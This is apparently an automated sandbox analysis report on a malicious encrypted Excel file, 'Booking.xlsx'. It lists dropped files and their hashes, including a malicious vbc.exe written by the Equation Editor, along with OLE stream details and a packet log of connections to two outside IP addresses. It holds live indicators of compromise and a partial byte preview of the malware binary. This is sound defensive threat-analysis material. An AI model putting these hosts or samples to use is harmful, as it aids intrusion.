                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BE736E6.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):111378
                                                                                                                                                          Entropy (8bit):7.963743447431302
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                          MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                          SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                          SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                          SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97136DAF.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A977B918.png
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):111378
                                                                                                                                                          Entropy (8bit):7.963743447431302
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                          MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                          SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                          SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                          SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                          C:\Users\user\Desktop\~$Booking.xlsx
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):330
                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):458240
                                                                                                                                                          Entropy (8bit):7.598110124449528
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:IU5VLxPv1XYRaFTl3corvZDruuCwgrd3P:1VlVXYUFTSorvRSww3P
                                                                                                                                                          MD5:CACC98CE31DE0F63F04834BF952AC3DC
                                                                                                                                                          SHA1:064A71647FB159152BA653654B0C02024B44DADC
                                                                                                                                                          SHA-256:78F83F782F8D2077DD50D65BADB4ED36EC24C029241287F76560E60733B61C29
                                                                                                                                                          SHA-512:3910B1B22CCCA3FFBCC22A7181ABB5330C4ADF5E0B55C67ED3B507ED55365F721F360CDEB0A302C8FA40ACD87D67EABEE54D0392589B486FC9155560B7EF9C65
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 15%
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.4`..............P.................. ... ....@.. .......................`............@.................................4...O.... ..,....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...,.... ......................@..@.reloc.......@......................@..B................h.......H...........@......n.......X............................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....og...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....+..*.0......

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.996692090719019
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:Booking.xlsx
                                                                                                                                                          File size:2512384
                                                                                                                                                          MD5:889b85a1924c2498073da4f94d312cd0
                                                                                                                                                          SHA1:0384c76d8fcc5ca57b63a21a169198b8dbc1f31b
                                                                                                                                                          SHA256:3d3fc5984e22957b53d18bd58555c96b4895f4436f9ce1fed5dc2fb63878720c
                                                                                                                                                          SHA512:898875df3d2609289f70d020c024a5443ed2254ff1a1e5602f84d0c595ed495aa1d810f1843573ee0380820ef4c7b1031073830f0d9d578036608c36e62e5dd5
                                                                                                                                                          SSDEEP:49152:VOWtOEe2TfER3ULGCaoK8yXOKqVubHYqickfY9ISrhcmbgq24ScjRBPc:yE/63a7yXWwHY+kQ9ISJb2cjRBPc
                                                                                                                                                          File Content Preview:........................>...................'...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "Booking.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2488776
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:2488776
                                                                                                                                                          Entropy:7.9999180457
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . % . . . . . . . . . = . . . 7 . . a . . . . a 3 . + n . . l . . . . . . . + ~ b . ~ ^ . q . L S z K n q . m . . . . c . . . . . T . . . . > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . . ' . O . . U . W > . 9 F . r . .
                                                                                                                                                          Data Raw:b1 f9 25 00 00 00 00 00 a5 d6 20 ba b2 3d 93 8d e5 37 2e d9 61 91 97 c3 2e 61 33 8d 2b 6e c3 a9 6c fc b6 bb 84 e6 e6 9a 2b 7e 62 8a 7e 5e ea 71 be 4c 53 7a 4b 6e 71 1d 6d 86 e6 89 ac 63 c6 1a bd da cf 54 bf 0d a6 13 3e 04 39 46 c5 72 96 10 27 fa 4f e6 c1 55 1c 57 3e 04 39 46 c5 72 96 10 27 fa 4f e6 c1 55 1c 57 3e 04 39 46 c5 72 96 10 27 fa 4f e6 c1 55 1c 57 3e 04 39 46 c5 72 96 10
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.58785976805
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . d . . . . j # / . . . . . . . . H Y ) . . # . . 6 . . . . . . 3 i _ . - . . . A . . . t . . . . . G . . . . 9 . . . . ^ .
                                                                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Feb 23, 2021 17:47:41.767702103 CET4916580192.168.2.2254.67.120.65
                                                                                                                                                          Feb 23, 2021 17:47:41.967780113 CET804916554.67.120.65192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:41.969852924 CET4916580192.168.2.2254.67.120.65
                                                                                                                                                          Feb 23, 2021 17:47:41.970222950 CET4916580192.168.2.2254.67.120.65
                                                                                                                                                          Feb 23, 2021 17:47:42.185451031 CET804916554.67.120.65192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.185610056 CET4916580192.168.2.2254.67.120.65
                                                                                                                                                          Feb 23, 2021 17:47:42.185741901 CET4916580192.168.2.2254.67.120.65
                                                                                                                                                          Feb 23, 2021 17:47:42.345911026 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:42.385538101 CET804916554.67.120.65192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.568430901 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.568624973 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:42.569209099 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:42.792349100 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.792376041 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.792392969 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.792409897 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:42.792468071 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:42.792604923 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.014566898 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014635086 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014691114 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014760017 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014816046 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014837027 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.014864922 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.014873028 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014895916 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.014928102 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.014945984 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.014978886 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.014981031 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.015041113 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237294912 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237361908 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237454891 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237508059 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237549067 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237559080 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237576962 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237580061 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237596035 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237612009 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237627029 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237662077 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237663031 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237720013 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237737894 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237770081 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237771034 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237821102 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237857103 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237869978 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237884045 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237916946 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.237920046 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.237968922 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.238001108 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.238019943 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.238027096 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.238070965 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.238071918 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.238126993 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.238161087 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.238188982 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.240314007 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460165977 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460190058 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460203886 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460220098 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460241079 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460258007 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460273981 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460290909 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460308075 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460325003 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460340977 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460357904 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460376978 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460393906 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460410118 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460419893 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460459948 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460491896 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460576057 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460597038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460613966 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460629940 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460665941 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460690022 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460772038 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460792065 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460808039 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460824966 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460841894 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460856915 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460877895 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460895061 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460906982 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460923910 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460926056 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460939884 CET8049166103.141.138.118192.168.2.22
                                                                                                                                                          Feb 23, 2021 17:47:43.460964918 CET4916680192.168.2.22103.141.138.118
                                                                                                                                                          Feb 23, 2021 17:47:43.460969925 CET4916680192.168.2.22103.141.138.118
